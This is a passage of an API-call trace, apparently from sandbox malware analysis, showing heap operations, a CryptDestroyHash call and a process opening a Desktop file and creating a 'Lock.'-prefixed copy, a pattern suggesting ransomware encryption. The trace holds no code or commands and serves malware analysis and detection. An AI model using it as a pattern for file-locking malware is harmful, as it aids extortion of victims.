(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0087.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.829] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0087.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0087.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f7180 [0087.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7180, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0087.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0087.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0087.830] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyHash") returned 0x763af0e0 [0087.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0087.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.830] CryptDestroyHash (hHash=0x9a40c0) returned 1 [0087.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0087.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0087.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0087.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0087.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a90 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0087.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0087.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.835] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.835] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0087.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0087.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0087.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0087.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0087.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0087.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0087.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2aae878 [0087.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0087.836] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/7jATM.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\7jatm.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0087.836] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.836] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0087.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7120 [0087.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.836] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0087.836] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.7jATM.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.7jatm.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0087.837] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 